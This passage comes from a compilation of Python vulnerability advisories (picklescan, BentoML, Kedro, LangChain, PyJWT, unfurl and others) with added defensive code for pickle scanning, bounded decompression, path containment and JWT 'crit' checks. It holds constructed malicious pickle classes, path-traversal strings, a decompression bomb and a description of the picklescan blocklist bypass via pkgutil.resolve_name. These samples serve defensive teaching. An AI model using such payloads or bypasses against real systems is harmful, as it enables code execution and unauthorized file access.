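            found.append((recent[0], recent[1]))
            recent = []
        elif op.name not in TRANSPARENT_OPS:
            recent = []
    return found


def classify(data: bytes) -> str:
    try:
        imports = extract_globals(data)
    except ValueError:
        return "UNPARSEABLE"           # treated as unsafe by is_safe()
    verdict = "LIKELY_SAFE"
    for module, name in imports:
        if (module, name) in ALLOWED_GLOBALS:
            continue
        if module.split(".", 1)[0] in DANGEROUS_MODULES:
            return "OVERTLY_MALICIOUS"
        verdict = "SUSPICIOUS"
    return verdict


def is_safe(data: bytes) -> bool:
    return classify(data) == "LIKELY_SAFE"


class RunPathPayload:
    """Constructed sample: unpickling would call runpy.run_path (not done here)."""
    def __reduce__(self):
        import runpy
        return (runpy.run_path, ("/tmp/not-run.py",))


class CtypesPayload:
    """Constructed sample: unpickling would load a shared library via ctypes."""
    def __reduce__(self):
        import ctypes
        return (ctypes.CDLL, ("libc.so.6",))


def samples() -> dict:
    return {
        "benign": pickle.dumps({"weights": [0.1, 0.2], "epoch": 3}, protocol=4),
        "runpy_proto2": pickle.dumps(RunPathPayload(), protocol=2),   # GLOBAL opcode
        "runpy_proto4": pickle.dumps(RunPathPayload(), protocol=4),   # STACK_GLOBAL opcode
        "ctypes_proto5": pickle.dumps(CtypesPayload(), protocol=5),
    }


if __name__ == "__main__":
    for label, data in samples().items():
        print(f"{label:14} {classify(data):18} {extract_globals(data)}")
```

The allowlist-first structure is the lesson of these advisories: a deny list is only ever a list of what someone has already thought of, so the default verdict for an unknown import must be "not safe", and the deny list serves to make the loud cases louder.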
Wiz
CVE-2026-35043 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.8
CVE-2026-35043 [HIGH] CVE-2026-35043 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-35043 :
Python vulnerability analysis and mitigation
BentoML is a Python library for building online serving systems optimized for AI apps and model inference. Prior to 1.4.38, the cloud deployment path in src/bentoml/_internal/cloud/deployment.py was not included in the fix for CVE-2026-33744. Line 1648 interpolates system_packages directly into a shell command using an f-string without any quoting. The generated script is uploaded to BentoCloud as setup.sh and executed on the cloud build infrastructure during deployment, making this a remote code execution on the CI/CD tier. This vulnerability is fixed in 1.4.38.
Source : NVD
## 7.8
Score
Published April 6, 2026
Severity HIGH
CNA Score 7.8
Affected Technologies
Python
Has Public Exploit No
Has CISA KEV Exploit N
Wiz
GHSA-vfgx-5q85-58q3 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 9.2
[CRITICAL] GHSA-vfgx-5q85-58q3 Impact, Exploitability, and Mitigation Steps | Wiz
## GHSA-vfgx-5q85-58q3 :
Python vulnerability analysis and mitigation
## Summary
generate_pseudorandom_sequence()
openssl_encrypt/plugins/steganography/core/utils.py
random
## Affected Code
```python
random.seed(seed)
sequence = random.sample(range(max_value), min(length, max_value))
return sequence
```
SecureBytes
## Impact
The Mersenne Twister's state can be recovered from approximately 624 outputs. An attacker who knows or guesses the password can predict the PRNG sequence and determine exactly which pixels contain hidden data, potentially extracting the hidden data without the password.
## Recommended Fix
secrets
Use full 32-byte SHA-256 output as seed material
SecureBytes
## Fix
09e96e0
releases/1.4.x
Source : NVD
## 6.6
Score
Published March 31, 2026
Severity MEDIU
Wiz
CVE-2026-1669 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.1
CVE-2026-1669 [HIGH] CVE-2026-1669 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-1669 :
Python vulnerability analysis and mitigation
Arbitrary file read in the model loading mechanism (HDF5 integration) in Keras versions 3.0.0 through 3.13.1 on all supported platforms allows a remote attacker to read local files and disclose sensitive information via a crafted .keras model file utilizing HDF5 external dataset references.
Source : NVD
## 7.1
Score
Published February 11, 2026
Severity HIGH
CNA Score 7.1
Affected Technologies
Python
Wolfi
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 2.4
Exploitation Probability (EPSS) N/A
Affected packages and libraries
tensorflow-cpu-jupyter
keras
Sources
NVD
Chainguard Has Fix Added at: Feb 20, 2026
Debian 11
Wiz
CVE-2026-21445 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.8
CVE-2026-21445 [HIGH] CVE-2026-21445 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-21445 :
Python vulnerability analysis and mitigation
Langflow is a tool for building and deploying AI-powered agents and workflows. Prior to version 1.7.0.dev45, multiple critical API endpoints in Langflow are missing authentication controls. The issue allows any unauthenticated user to access sensitive user conversation data, transaction histories, and perform destructive operations including message deletion. This affects endpoints handling personal data and system operations that should require proper authorization. Version 1.7.0.dev45 contains a patch.
Source : NVD
## 8.8
Score
Published January 2, 2026
Severity HIGH
CNA Score 8.8
Affected Technologies
Python
Homebrew
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date
Wiz
CVE-2026-21874 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
CVE-2026-21874 [MEDIUM] CVE-2026-21874 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-21874 :
Python vulnerability analysis and mitigation
NiceGUI is a Python-based UI framework. From versions v2.10.0 to 3.4.1, an unauthenticated attacker can exhaust Redis connections by repeatedly opening and closing browser tabs on any NiceGUI application using Redis-backed storage. Connections are never released, leading to service degradation when Redis hits its connection limit. NiceGUI continues accepting new connections - errors are logged but the app stays up with broken storage functionality. This issue has been patched in version 3.5.0.
Source : NVD
## 5.3
Score
Published January 8, 2026
Severity MEDIUM
CNA Score 5.3
Affected Technologies
Python
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation
Wiz
CVE-2026-35167 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.1
CVE-2026-35167 [HIGH] CVE-2026-35167 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-35167 :
Python vulnerability analysis and mitigation
Kedro is a toolbox for production-ready data science. Prior to 1.3.0, the _get_versioned_path() method in kedro/io/core.py constructs filesystem paths by directly interpolating user-supplied version strings without sanitization. Because version strings are used as path components, traversal sequences such as ../ are preserved and can escape the intended versioned dataset directory.
This is reachable through multiple entry points: catalog.load(..., version=...), DataCatalog.from_config(..., load_versions=...), and the CLI via kedro run --load-versions=dataset:../../../secrets. An attacker who can influence the version string can force Kedro to load files from outside the intended version directory, enabling unauthorized file
## CVE-2026-34445 [HIGH] (Wiz, CVSS 8.6): Python vulnerability analysis and mitigation
Open Neural Network Exchange (ONNX) is an open standard for machine learning interoperability. Prior to version 1.21.0, the ExternalDataInfo class in ONNX was using Python’s setattr() function to load metadata (like file paths or data lengths) directly from an ONNX model file. It didn’t check if the "keys" in the file were valid. Due to this, an attacker could craft a malicious model that overwrites internal object properties. This issue has been patched in version 1.21.0.
Source: NVD
Score 8.6
Published April 1, 2026
Severity HIGH
CNA Score 8.6
Affected Technologies
Python
Wolfi
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
## CVE-2026-34070 [HIGH] (Wiz, CVSS 7.5): Python vulnerability analysis and mitigation
LangChain is a framework for building agents and LLM-powered applications. Prior to version 1.2.22, multiple functions in langchain_core.prompts.loading read files from paths embedded in deserialized config dicts without validating against directory traversal or absolute path injection. When an application passes user-influenced prompt configurations to load_prompt() or load_prompt_from_config(), an attacker can read arbitrary files on the host filesystem, constrained only by file-extension checks (.txt for templates, .json/.yaml for examples). This issue has been patched in version 1.2.22.
Source: NVD
Score 7.5
Published March 31, 2026
Severity HIGH
CNA Score 7.5
Affected Technologies
Python
## CVE-2026-21873 [HIGH] (Wiz, CVSS 7.2): Python vulnerability analysis and mitigation
NiceGUI is a Python-based UI framework. From versions 2.22.0 to 3.4.1, an unsafe implementation in the pushstate event listener used by ui.sub_pages allows an attacker to manipulate the fragment identifier of the URL, which they can do despite being cross-site, using an iframe. This issue has been patched in version 3.5.0.
Source: NVD
Score 6.1
Published January 8, 2026
Severity MEDIUM
CNA Score 7.2
Affected Technologies
Python
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 4
Exploitation Probability (EPSS) N/A
Affected packages and libraries
nicegui
Sources
NVD
pip Severity HIGH Has Fix Added at: Jan 11, 2026
## CVE-2026-29787 [MEDIUM] (Wiz, CVSS 5.3): Python vulnerability analysis and mitigation
mcp-memory-service is an open-source memory backend for multi-agent systems. Prior to version 10.21.0, the /api/health/detailed endpoint returns detailed system information including OS version, Python version, CPU count, memory totals, disk usage, and the full database filesystem path. When MCP_ALLOW_ANONYMOUS_ACCESS=true is set (required for the HTTP server to function without OAuth/API key), this endpoint is accessible without authentication. Combined with the default 0.0.0.0 binding, this exposes sensitive reconnaissance data to the entire network. This issue has been patched in version 10.21.0.
Source: NVD
Score 5.3
Published March 7, 2026
Severity MEDIUM
CNA Score 5.3
Affected Technologies
Python
## CVE-2026-28795 [HIGH] (Wiz, CVSS 8.7): Python vulnerability analysis and mitigation
OpenChatBI is an intelligent chat-based BI tool powered by large language models, designed to help users query, analyze, and visualize data through natural language conversations. Prior to version 0.2.2, the save_report tool in openchatbi/tool/save_report.py suffers from a critical path traversal vulnerability due to insufficient input sanitization of the file_format parameter. This issue has been patched in version 0.2.2.
Source: NVD
Score 8.7
Published March 6, 2026
Severity HIGH
CNA Score 8.7
Affected Technologies
Python
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 24.6
Exploitation Probability (EPSS) 0.1
## CVE-2025-14691 [MEDIUM] (Wiz, CVSS 5.3): Python vulnerability analysis and mitigation
A vulnerability was detected in Mayan EDMS up to 4.10.1. The affected element is an unknown function of the file /authentication/. The manipulation results in cross site scripting. The attack may be performed from remote. The exploit is now public and may be used. Upgrading to version 4.10.2 is sufficient to fix this issue. You should upgrade the affected component. The vendor confirms that this is "[f]ixed in version 4.10.2". Furthermore, that "[b]ackports for older versions in process and will be out as soon as their respective CI pipelines complete."
Source: NVD
Score 5.3
Published December 14, 2025
Severity MEDIUM
CNA Score 5.3
Affected Technologies
Python
Has Public Exploit Yes
Has CISA KEV Exploit No
## GHSA-h45m-mgcp-q388 [CRITICAL] (Wiz, CVSS 9.2): Python vulnerability analysis and mitigation
## Severity: HIGH
## Summary
`openssl_encrypt_server/modules/pepper/totp.py`, `defaultdict(list)`
## Affected Code
```python
from collections import defaultdict
from datetime import datetime
from typing import Dict, List


class TOTPRateLimiter:
    def __init__(self, ...):  # remaining parameters are elided in the advisory
        # Per-process, in-memory state: neither shared between workers
        # nor persisted across restarts.
        self.attempts: Dict[str, List[datetime]] = defaultdict(list)
        self.lockouts: Dict[str, datetime] = {}


class TOTPService:
    _rate_limiter = TOTPRateLimiter()  # Class variable, in-memory only
```
## Impact
Rate limit state is not shared across multiple server instances/workers — an attacker can distribute attempts
All rate limit state is lost on server restart — allows immediate retry
In multi-worker deployments, each worker has independent rate limit state
## Recommended Fix
Use Redis or the database for rate limit state storage
Or use a shared-memory
## GHSA-vvpj-8cmc-gx39 (Wiz): Python vulnerability analysis and mitigation
## Summary
`pkgutil.resolve_name()` with a `"module:attribute"` string; `os.system`, `builtins.exec`, `subprocess.call`; `_unsafe_globals`
## Severity
Critical (CVSS 10.0) — Universal bypass of all blocklist entries. Any blocked function can be invoked.
## Affected Versions
picklescan <= 1.0.3 (all versions including latest)
## Details
## How It Works
A pickle file uses two chained REDUCE calls:
1. STACK_GLOBAL: push pkgutil.resolve_name
2. REDUCE: call resolve_name("os:system") → returns os.system function object
3. REDUCE: call the returned function("malicious command") → RCE
picklescan's opcode scanner sees:
```text
STACK_GLOBAL  pkgutil resolve_name
REDUCE        "os:system"
```
## Decompile
## GHSA-hvc7-763r-4f3h [CRITICAL] (Wiz, CVSS 9.2): Python vulnerability analysis and mitigation
## Summary
`revoke_key` in `openssl_encrypt_server/modules/keyserver/service.py`: `client_id` vs. `key.owner_client_id`
## Impact
Any authenticated client can revoke any other client's key, as long as they provide a valid revocation signature. While the signature requirement mitigates this somewhat (you need the private key to sign), the lack of ownership check is a defense-in-depth gap.
## Recommended Fix
Check that `client_id == key.owner_client_id` and return 403 Forbidden if the requesting client does not own the key.
## Fix
05e45f3 (releases/1.4.x)
Source: NVD
Score 6.6
Published April 1, 2026
Severity MEDIUM
CNA Score N/A
Affected Technologies
Python
Has Public Exploit No
Has CISA KEV Exploit No
## CVE-2026-24157 [HIGH] (Wiz, CVSS 7.8): Python vulnerability analysis and mitigation
NVIDIA NeMo Framework contains a vulnerability in checkpoint loading where an attacker could cause remote code execution. A successful exploit of this vulnerability might lead to code execution, escalation of privileges, information disclosure and data tampering.
Source: NVD
Score 9.8
Published March 24, 2026
Severity CRITICAL
CNA Score 7.8
Affected Technologies
Python
NixOS
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 27.6
Exploitation Probability (EPSS) 0.1
Affected packages and libraries
nemo-toolkit
nemo
Sources
NVD
pip Severity HIGH Has Fix Added at: Apr 02, 2026
Nix Severity CRITICAL Has Fix Added at
## CVE-2026-34935 [CRITICAL] (Wiz, CVSS 9.8): Python vulnerability analysis and mitigation
PraisonAI is a multi-agent teams system. From version 4.5.15 to before version 4.5.69, the --mcp CLI argument is passed directly to shlex.split() and forwarded through the call chain to anyio.open_process() with no validation, allowlist check, or sanitization at any hop, allowing arbitrary OS command execution as the process user. This issue has been patched in version 4.5.69.
Source: NVD
Score 9.8
Published April 3, 2026
Severity CRITICAL
CNA Score 9.8
Affected Technologies
Python
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 24.3
Exploitation Probability (EPSS) 0.1
Affected packages and libraries
praisonai
## GHSA-h5qv-qjv4-pc5m (Wiz): Python vulnerability analysis and mitigation
## Summary
`zlib.decompress()`
## Details
`unfurl/parsers/parse_compressed.py`: `zlib.decompress(decoded)`
Inputs are accepted from URL components that match base64 patterns.
Highly compressible payloads can expand orders of magnitude larger than their compressed size.
## PoC
`security_poc/poc_decompression_bomb.py --generate-only`
The script creates a base64-encoded zlib payload embedded in a URL.
`/json/visjs`, `--test`
## PoC Script
```python
#!/usr/bin/env python3
"""
Unfurl Decompression Bomb Proof of Concept
This PoC demonstrates a Denial of Service vulnerability in Unfurl's
compressed data parsing. The zlib.decompress() call has no size limits,
allowing an attacker to submit small payloads that expand to gigabytes.
"""
```
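The unfurl advisory above is the textbook decompression-bomb shape: `zlib.decompress()` with no ceiling, applied to a payload pulled out of a URL. The block below is an added example written for this page, not unfurl's code and not the advisory's PoC script. It inflates through `zlib.decompressobj()` with `max_length` so the output can never exceed a fixed budget, and rejects a constructed 8 MiB bomb that compresses to a few kilobytes. `MAX_OUTPUT`, `inflate_url_param`, `make_bomb` and the sample payloads are assumptions made for the demonstration.

```python
"""Added example (not unfurl's code): inflate untrusted zlib data under a hard
output ceiling instead of calling zlib.decompress() unbounded."""
import base64
import zlib

MAX_OUTPUT = 1 * 1024 * 1024   # assumed 1 MiB budget for data parsed from a URL
CHUNK = 64 * 1024              # output produced per decompress() call


class DecompressionRejected(ValueError):
    """Output would exceed the budget, or the stream never completes."""


def bounded_decompress(data: bytes, limit: int = MAX_OUTPUT) -> bytes:
    """Inflate `data`, never holding more than `limit` bytes of output.

    decompressobj().decompress(buf, max_length) returns at most max_length
    bytes and parks unprocessed input in .unconsumed_tail, so the real size
    of the payload is discovered one chunk at a time.
    """
    d = zlib.decompressobj()
    out = bytearray()
    pending = data
    while True:
        room = limit - len(out)
        # Ask for one byte more than the remaining budget: if it arrives the
        # payload is over the limit; if the stream ends first it fits exactly.
        chunk = d.decompress(pending, min(room + 1, CHUNK))
        out += chunk
        pending = d.unconsumed_tail
        if len(out) > limit:
            raise DecompressionRejected(f"output exceeds {limit} bytes")
        if d.eof:
            return bytes(out)
        if not chunk and not pending:
            raise DecompressionRejected("compressed stream is truncated")


def inflate_url_param(value: str, limit: int = MAX_OUTPUT) -> bytes:
    """Base64url-decode a URL parameter (padding optional) and inflate it."""
    raw = base64.urlsafe_b64decode(value + "=" * (-len(value) % 4))
    return bounded_decompress(raw, limit)


def make_bomb(size: int = 8 * 1024 * 1024) -> bytes:
    """Constructed bomb: highly compressible zeros (roughly 1000:1 ratio)."""
    return zlib.compress(b"\0" * size, 9)


def demo() -> dict:
    """Run a benign payload and the bomb through the guarded path."""
    plain = b"benign payload " * 40
    small = base64.urlsafe_b64encode(zlib.compress(plain)).decode()
    bomb = make_bomb()
    report = {"bomb_compressed_bytes": len(bomb),
              "small_roundtrip": inflate_url_param(small) == plain}
    try:
        inflate_url_param(base64.urlsafe_b64encode(bomb).decode())
        report["bomb"] = "inflated"
    except DecompressionRejected as exc:
        report["bomb"] = f"rejected: {exc}"
    return report


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

The budget is enforced on output, not on the compressed size, which is the quantity an attacker controls least; asking for `room + 1` bytes on the final call lets a payload of exactly `limit` bytes through while still catching the first byte over it.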
## CVE-2026-32611 [HIGH] (Wiz, CVSS 7.0): Python vulnerability analysis and mitigation
`psycopg.sql`, `glances/exports/glances_duckdb/__init__.py`, `?`
Source: NVD
Score 9.1
Published March 18, 2026
Severity CRITICAL
CNA Score 7.0
Affected Technologies
Python
NixOS
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 2.5
Exploitation Probability (EPSS) N/A
Affected packages and libraries
glances
Sources
NVD
Debian 12, 13 Severity MEDIUM No Fix Added at: Mar 19, 2026
Debian 14 Severity CRITICAL Has Fix Added at: Mar 19, 2026
Echo Severity CRITICAL No Fix Added at: Mar 19, 2026
pip Severity HIGH Has Fix Added at: Mar 17, 2026
Homebrew Severity CRITICAL Has Fix Added at: Mar 20, 2026
Nix Severity CRITICAL
## CVE-2026-32711 [HIGH] (Wiz, CVSS 7.8): Python vulnerability analysis and mitigation
pydicom is a pure Python package for working with DICOM files. Versions 2.0.0-rc.1 through 3.0.1 are vulnerable to Path Traversal through a maliciously crafted DICOMDIR ReferencedFileID when it is set to a path outside the File-set root. pydicom resolves the path only to confirm that it exists, but does not verify that the resolved path remains under the File-set root. Subsequent public FileSet operations such as copy(), write(), and remove()+write(use_existing=True) use that unchecked path in file I/O operations. This allows arbitrary file read/copy and, in some flows, move/delete outside the File-set root. This issue has been fixed in version 3.0.2.
Source: NVD
Score 7.8
Published March 20, 2026
Severity HIGH
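The PraisonAI issue this page is about, the Kedro version-string traversal, the LangChain absolute-path injection and the pydicom ReferencedFileID case above share one defect: a path is derived from attacker-controlled input and used for file I/O before anything proves it still lies under the intended root. The block below is an added example written for this page, not code from PraisonAI, Kedro, LangChain or pydicom. `publish_bundle`, `resolve_under_root`, the registry layout `<root>/<name>/<version>/manifest.json` and the segment grammar are assumptions made for the demonstration. It checks the manifest against the route first, resolves the candidate path and requires the root to be among its parents, and only then touches the filesystem.

```python
"""Added example for this page (not PraisonAI, Kedro, LangChain or pydicom
code): derive a path from untrusted input, prove it is still inside the
configured root, and only then perform file I/O."""
import json
import re
import tempfile
from pathlib import Path

# Assumed grammar for one path segment (bundle name, version, file name).
# It already excludes "..", "/", "\\", NUL and leading dots; the containment
# check in resolve_under_root() is kept as an independent second layer.
SEGMENT_RE = re.compile(r"[A-Za-z0-9][A-Za-z0-9._-]{0,127}")


class PathEscapeError(ValueError):
    """The derived path would not be strictly inside the configured root."""


def resolve_under_root(root, *segments) -> Path:
    """Join segments onto root and return the resolved path, or raise.

    Path.joinpath() discards the root when a segment is absolute
    ("/etc/passwd"), and "../" is only neutralised by resolve(), so the
    test is made on the fully resolved candidate; resolve() also follows
    symlinks, so a link inside root that points outside it is rejected.
    """
    root_resolved = Path(root).resolve()
    candidate = root_resolved.joinpath(*segments).resolve()
    if root_resolved not in candidate.parents:  # also rejects candidate == root
        raise PathEscapeError(f"{candidate} is not inside {root_resolved}")
    return candidate


def validated_segment(value, what: str) -> str:
    if not isinstance(value, str) or not SEGMENT_RE.fullmatch(value):
        raise PathEscapeError(f"invalid {what}: {value!r}")
    return value


def publish_bundle(registry_root, route_name: str, route_version: str,
                   manifest_json: bytes) -> Path:
    """Hypothetical publish handler for a <root>/<name>/<version>/manifest.json
    layout: validate the manifest against the route and the root first, and
    create files last. Returns the path that was written."""
    manifest = json.loads(manifest_json)
    name = validated_segment(manifest.get("name"), "manifest name")
    version = validated_segment(manifest.get("version"), "manifest version")
    # The route is the trusted source of truth; the manifest must agree with it.
    if (name, version) != (route_name, route_version):
        raise PathEscapeError("manifest name/version does not match the route")
    target = resolve_under_root(registry_root, name, version, "manifest.json")
    target.parent.mkdir(parents=True, exist_ok=False)  # first filesystem write
    target.write_bytes(manifest_json)
    return target


def demo() -> dict:
    """Exercise the handler in a throw-away directory with one constructed
    good manifest and one constructed hostile manifest; report what happened."""
    root = Path(tempfile.mkdtemp(prefix="registry-"))
    good = json.dumps({"name": "demo-recipe", "version": "1.0.0"}).encode()
    hostile = json.dumps({"name": "../../../tmp/evil", "version": "1.0.0"}).encode()
    report = {"good": publish_bundle(root, "demo-recipe", "1.0.0", good).exists()}
    try:
        publish_bundle(root, "../../../tmp/evil", "1.0.0", hostile)
        report["hostile_manifest"] = "written"
    except PathEscapeError as exc:
        report["hostile_manifest"] = f"rejected: {exc}"
    # The containment layer on its own, bypassing the segment grammar.
    try:
        resolve_under_root(root, "demo-recipe", "..", "..", "escape")
        report["direct_traversal"] = "allowed"
    except PathEscapeError:
        report["direct_traversal"] = "rejected"
    # Nothing was created outside root and only the good bundle exists inside.
    report["files_under_root"] = sorted(
        p.relative_to(root).as_posix() for p in root.rglob("*") if p.is_file())
    return report


if __name__ == "__main__":
    print(json.dumps(demo(), indent=2))
```

Two points worth carrying into real code: the containment test must run on the fully resolved result rather than on the inputs, because `Path.joinpath()` silently discards the root when a later segment is absolute; and every filesystem write comes after both checks, so a rejected manifest leaves nothing behind, which is exactly the ordering the PraisonAI registry got wrong.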
## CVE-2026-32597 [HIGH] (Wiz, CVSS 7.5): Python vulnerability analysis and mitigation
PyJWT is a JSON Web Token implementation in Python. Prior to 2.12.0, PyJWT does not validate the crit (Critical) Header Parameter defined in RFC 7515 §4.1.11. When a JWS token contains a crit array listing extensions that PyJWT does not understand, the library accepts the token instead of rejecting it. This violates the MUST requirement in the RFC. This vulnerability is fixed in 2.12.0.
Wiz Threat Research note: This vulnerability's initial access potential has been overridden to FALSE by the Wiz Research team, as it does not allow RCE on its own.
Source: NVD
Score 7.5
Published March 13, 2026
Severity HIGH
CNA Score 7.5
Affected Technologies
Python
Wolfi
Has Public Exploit Yes
Has CISA KEV Exploit No
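The `crit` rule PyJWT did not enforce is mechanical and can be checked before a token is trusted. The block below is an added example written for this page, not PyJWT's code. It implements RFC 7515 §4.1.11 over a compact JWS: `crit`, when present, must be a non-empty array of unique strings, must not name registered headers, must name only headers that are actually present, and every entry must be one the application understands; anything else is a rejection. The tokens are constructed with a dummy signature, and `REGISTERED`, `check_crit`, `parse_header` and `accept_token` are names chosen for the example. Signature verification is a separate step that this check complements rather than replaces.

```python
"""Added example (not PyJWT code): enforce the JWS "crit" header parameter
as RFC 7515 section 4.1.11 requires, before a token is trusted."""
import base64
import json

# Header names registered by RFC 7515/7516/7519; the RFC reserves "crit" for
# extension parameters, so listing any of these in it is an error.
REGISTERED = {"alg", "jku", "jwk", "kid", "x5u", "x5c", "x5t", "x5t#S256",
              "typ", "cty", "crit", "enc", "zip"}


class InvalidCritHeader(ValueError):
    """The token must be rejected because of its crit parameter."""


def _b64url_decode(segment: str) -> bytes:
    return base64.urlsafe_b64decode(segment + "=" * (-len(segment) % 4))


def _b64url_encode(raw: bytes) -> str:
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode()


def check_crit(header: dict, understood: frozenset = frozenset()) -> list:
    """Return the critical extensions in use, or raise InvalidCritHeader."""
    if "crit" not in header:
        return []
    crit = header["crit"]
    if not isinstance(crit, list) or not crit or not all(isinstance(c, str) for c in crit):
        raise InvalidCritHeader("crit must be a non-empty array of strings")
    if len(set(crit)) != len(crit):
        raise InvalidCritHeader("crit contains duplicate entries")
    for name in crit:
        if name in REGISTERED:
            raise InvalidCritHeader(f"registered header {name!r} listed in crit")
        if name not in header:
            raise InvalidCritHeader(f"crit names absent header {name!r}")
        if name not in understood:
            raise InvalidCritHeader(f"unsupported critical extension {name!r}")
    return list(crit)


def parse_header(token: str) -> dict:
    """Decode the protected header of a compact-serialised JWS (3 segments)."""
    parts = token.split(".")
    if len(parts) != 3:
        raise InvalidCritHeader("not a compact JWS")
    header = json.loads(_b64url_decode(parts[0]))
    if not isinstance(header, dict):
        raise InvalidCritHeader("header is not a JSON object")
    return header


def make_token(header: dict, claims: dict) -> str:
    """Constructed token with a dummy signature, for the demonstration only."""
    enc = lambda obj: _b64url_encode(json.dumps(obj, separators=(",", ":")).encode())
    return ".".join([enc(header), enc(claims), _b64url_encode(b"dummy-signature")])


def accept_token(token: str, understood: frozenset = frozenset()) -> bool:
    """True if the crit check passes; False when the token must be rejected."""
    try:
        check_crit(parse_header(token), understood)
        return True
    except InvalidCritHeader:
        return False


if __name__ == "__main__":
    claims = {"sub": "alice"}
    ext = "http://example.invalid/ext"   # hypothetical extension header name
    plain = make_token({"alg": "HS256", "typ": "JWT"}, claims)
    critical = make_token({"alg": "HS256", "crit": [ext], ext: True}, claims)
    print("no crit            :", accept_token(plain))
    print("unknown critical   :", accept_token(critical))
    print("same, understood   :", accept_token(critical, frozenset({ext})))
```

The `understood` set is the application's list of extensions it actually implements; an empty set, the safe default, means any critical extension is a rejection, which is the behaviour the RFC's MUST requires and PyJWT lacked before 2.12.0.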
## CVE-2025-65431 [MEDIUM] (Wiz, CVSS 5.4): Python vulnerability analysis and mitigation
An issue was discovered in django-allauth before 65.13.0. Both the Okta and NetIQ providers were using preferred_username as the identifier for third-party provider accounts. That value may be mutable and should therefore be avoided for authorization decisions. The providers now use sub instead.
Source: NVD
Score 5.4
Published December 15, 2025
Severity MEDIUM
CNA Score 5.4
Affected Technologies
Python
Linux Debian
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 11.2
Exploitation Probability (EPSS) N/A
Affected packages and libraries
django-allauth
Sources
NVD
Debian 11, 12, 13 Severity MEDIUM No Fix Added at: Dec 16,
## CVE-2026-26331 [HIGH] (Wiz, CVSS 8.8): Python vulnerability analysis and mitigation
`--netrc-cmd` (`netrc_cmd`), `{}`
Source: NVD
Score 8.8
Published February 24, 2026
Severity HIGH
CNA Score 8.8
Affected Technologies
Python
NixOS
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 40.7
Exploitation Probability (EPSS) 0.2
Affected packages and libraries
yt-dlp
yt-dlp+default
Sources
NVD
Alpine 3.18, 3.19, 3.20, 3.21, 3.22 Severity HIGH No Fix Added at: Mar 02, 2026
Debian 12 Severity HIGH No Fix Added at: Feb 24, 2026
Debian 13 Severity MEDIUM No Fix Added at: Feb 24, 2026
Debian 14 Severity HIGH Has Fix Added at: F
## CVE-2026-33057 [CRITICAL] (Wiz, CVSS 9.8): Python vulnerability analysis and mitigation
Mesop is a Python-based UI framework that allows users to build web applications. In versions 1.2.2 and below, a web endpoint in the ai/ testing module infrastructure accepts untrusted Python code strings without any authentication and evaluates them, which is unrestricted remote code execution: anyone who can route HTTP requests to this server gains command execution on the host machine. The AI codebase package includes a lightweight debugging Flask server in ai/sandbox/wsgi_app.py whose /exec-py route accepts a base64-encoded raw code string in the code parameter of a plain POST request; the server saves the decoded payload to the operating system and executes it.
## GHSA-m7j5-r2p5-c39r (Wiz): Python vulnerability analysis and mitigation
## Summary
Unsafe pickle deserialization allows unauthenticated attackers to perform Arbitrary File Creation. By chaining the logging.FileHandler class, an attacker can bypass RCE-focused blocklists to create empty files on the server. The vulnerability allows creating zero-byte files in arbitrary locations but does not permit overwriting or modifying existing files.
## Details
The application deserializes untrusted pickle data. While RCE keywords may be blocked, the exploit abuses standard library features:
logging.FileHandler: The exploit instantiates this class using its default behavior (append mode).
Behavior on Existing Files: If the target file already exists, the handler opens it without modifying its con
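Both the picklescan bypass above (a REDUCE chain through `pkgutil.resolve_name`) and the `logging.FileHandler` file-creation gadget defeat scanners that look for specific dangerous names. The block below is an added example written for this page, not picklescan's code and not either advisory's PoC. It builds both payloads by hand from pickle opcodes, lists the globals a pickle imports by walking it with `pickletools.genops`, and shows that a blocklist verdict passes both while an allowlist verdict rejects both. The chain payload targets `os.getcwd` instead of `os.system` so that loading it is harmless; the FileHandler payload is only scanned, never loaded, because instantiating it would create the file. The blocklist and allowlist contents and the `/tmp/created-by-pickle.txt` path are assumptions for the demonstration.

```python
"""Added example (not picklescan's code): enumerate the globals a pickle
imports and compare a blocklist verdict with an allowlist verdict."""
import collections
import os
import pickle
import pickletools


def _s(text: str) -> bytes:
    """SHORT_BINUNICODE opcode: 0x8c, one length byte, UTF-8 payload (< 256 B)."""
    raw = text.encode()
    return b"\x8c" + bytes([len(raw)]) + raw


PROTO4, STACK_GLOBAL, REDUCE, TUPLE1, EMPTY_TUPLE, STOP = (
    b"\x80\x04", b"\x93", b"R", b"\x85", b")", b".")

# Constructed payload 1: the two-step REDUCE chain from the picklescan advisory,
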